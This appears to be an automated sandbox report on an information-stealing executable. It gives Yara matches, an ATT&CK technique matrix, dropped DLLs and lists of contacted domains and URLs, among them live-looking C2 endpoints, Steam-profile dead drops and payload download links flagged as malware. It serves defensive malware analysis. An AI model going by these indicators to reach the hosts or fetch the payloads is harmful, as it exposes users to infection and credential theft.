Source: Yara match	File source: 0.2.file.exe.3a05570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7516, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220C40 sqlite3_bind_zeroblob,	3_2_6C220C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220D60 sqlite3_bind_parameter_name,	3_2_6C220D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C148EA0 sqlite3_clear_bindings,	3_2_6C148EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6C220B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C146410 bind,WSAGetLastError,	3_2_6C146410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14C030 sqlite3_bind_parameter_count,	3_2_6C14C030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	3_2_6C14C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C146070 PR_Listen,	3_2_6C146070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1460B0 listen,WSAGetLastError,	3_2_6C1460B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	55 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	45%	Virustotal		Browse
file.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\BAAEHDBFID.exe	26%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66ecb454d2b4a_lgfdsjgds[1].exe	26%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
milldymarskwom.shop	4%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
chickerkuso.shop	4%	Virustotal	Browse
opponnentduei.shop	4%	Virustotal	Browse
quotamkdsdqo.shop	4%	Virustotal	Browse
questionmwq.shop	3%	Virustotal	Browse
cowod.hopto.org	0%	Virustotal	Browse
carrtychaintnyw.shop	4%	Virustotal	Browse
achievenmtynwjq.shop	4%	Virustotal	Browse
puredoffustow.shop	4%	Virustotal	Browse
metallygaricwo.shop	4%	Virustotal	Browse
genedjestytw.shop	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe1kkkkn	100%	Avira URL Cloud	malware
opponnentduei.shop	100%	Avira URL Cloud	malware
https://achievenmtynwjq.shop/	100%	Avira URL Cloud	malware
https://community.akamai.su	0%	Avira URL Cloud	safe
https://116.203.165.127/nss3.dlllu	100%	Avira URL Cloud	malware
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://116.203.165.127	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exedata;	100%	Avira URL Cloud	malware
opponnentduei.shop	4%	Virustotal		Browse
https://achievenmtynwjq.shop/	4%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Avira URL Cloud	safe
https://116.203.165.127	0%	Virustotal		Browse
http://www.valvesoftware.com/legal.htm	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Virustotal		Browse
https://www.youtube.com	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://116.203.165.127/vcruntime140.dlli	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Virustotal		Browse
http://www.valvesoftware.com/legal.htm	0%	Virustotal		Browse
https://www.youtube.com	0%	Virustotal		Browse
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/765611997804188698~	0%	Avira URL Cloud	safe
http://cowod.hoptoJJKJKFI	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Virustotal		Browse
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Virustotal		Browse
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://puredoffustow.shop/api	100%	Avira URL Cloud	malware
https://quotamkdsdqo.shop/	100%	Avira URL Cloud	malware
https://t.me/ae5edu55uhellosqlp.dllMozilla/5.0	0%	Avira URL Cloud	safe
https://opponnentduei.shop/api	100%	Avira URL Cloud	malware
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
quotamkdsdqo.shop	100%	Avira URL Cloud	malware
http://127.0.0.1	0%	Avira URL Cloud	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	Avira URL Cloud	safe
https://quotamkdsdqo.shop/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	Avira URL Cloud	safe
https://carrtychaintnyw.shop/y	100%	Avira URL Cloud	malware
http://cowod.hopto.JKJKFI	0%	Avira URL Cloud	safe
https://carrtychaintnyw.shop/api	100%	Avira URL Cloud	malware
https://achievenmtynwjq.shop/api	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://checkout.steampowered.com/	0%	Avira URL Cloud	safe
chickerkuso.shop	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
https://116.203.165.127/softokn3.dll	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exej$	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0	0%	Avira URL Cloud	safe
https://steamcommunity.com/$	0%	Avira URL Cloud	safe
https://help.steampowered.com/en/	0%	Avira URL Cloud	safe
https://metallygaricwo.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/	0%	Avira URL Cloud	safe
https://recaptcha.net/recaptcha/;	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/inventory/	0%	Avira URL Cloud	safe
https://steamcommunity.com/O	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869	0%	Avira URL Cloud	safe
https://broadcast.st.dl.eccdnx.com	0%	Avira URL Cloud	safe
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
https://login.steampowered.com/	0%	Avira URL Cloud	safe
https://genedjestytw.shop/	100%	Avira URL Cloud	malware
https://store.steampowered.com/legal/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://116.203.165.127/freebl3.dll~t	100%	Avira URL Cloud	malware
http://127.0.0.1:27060	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
https://api.steampowered.com/	0%	Avira URL Cloud	safe
https://store.steampowered.com/mobile	0%	Avira URL Cloud	safe
https://chickerkuso.shop/api	100%	Avira URL Cloud	malware
https://carrtychaintnyw.shop/	100%	Avira URL Cloud	malware
https://player.vimeo.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
milldymarskwom.shop	188.114.96.3	true	true	4%, Virustotal, Browse	unknown
steamcommunity.com	23.50.98.133	true	true	0%, Virustotal, Browse	unknown
chickerkuso.shop	104.21.88.61	true	true	4%, Virustotal, Browse	unknown
opponnentduei.shop	188.114.97.3	true	true	4%, Virustotal, Browse	unknown
carrtychaintnyw.shop	172.67.192.105	true	true	4%, Virustotal, Browse	unknown
quotamkdsdqo.shop	188.114.96.3	true	true	4%, Virustotal, Browse	unknown
cowod.hopto.org	45.132.206.251	true	true	0%, Virustotal, Browse	unknown
puredoffustow.shop	188.114.97.3	true	true	4%, Virustotal, Browse	unknown
achievenmtynwjq.shop	188.114.97.3	true	true	4%, Virustotal, Browse	unknown
questionmwq.shop	172.67.204.62	true	true	3%, Virustotal, Browse	unknown
metallygaricwo.shop	104.21.75.242	true	true	4%, Virustotal, Browse	unknown
genedjestytw.shop	unknown	unknown	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
opponnentduei.shop	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://puredoffustow.shop/api	true	Avira URL Cloud: malware	unknown
https://opponnentduei.shop/api	true	Avira URL Cloud: malware	unknown
quotamkdsdqo.shop	true	Avira URL Cloud: malware	unknown
https://carrtychaintnyw.shop/api	true	Avira URL Cloud: malware	unknown
https://achievenmtynwjq.shop/api	true	Avira URL Cloud: malware	unknown
chickerkuso.shop	true	Avira URL Cloud: malware	unknown
https://116.203.165.127/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://metallygaricwo.shop/api	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe	false	Avira URL Cloud: malware	unknown
https://chickerkuso.shop/api	true	Avira URL Cloud: malware	unknown
achievenmtynwjq.shop	true	Avira URL Cloud: malware	unknown
https://quotamkdsdqo.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe1kkkkn	RegAsm.exe, 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	FHCAEG.3.dr	false	URL Reputation: safe	unknown
https://116.203.165.127/nss3.dlllu	RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	FHCAEG.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.su	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://achievenmtynwjq.shop/	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.203.165.127	76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exedata;	RegAsm.exe, 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.youtube.com	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.203.165.127/vcruntime140.dlli	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/765611997804188698~	RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hoptoJJKJKFI	RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	false	Avira URL Cloud: safe	unknown
https://quotamkdsdqo.shop/	RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://t.me/ae5edu55uhellosqlp.dllMozilla/5.0	file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FHCAEG.3.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	FHCAEG.3.dr	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://carrtychaintnyw.shop/y	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cowod.hopto.JKJKFI	RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	DBFIEH.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exej$	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0	file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/$	RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
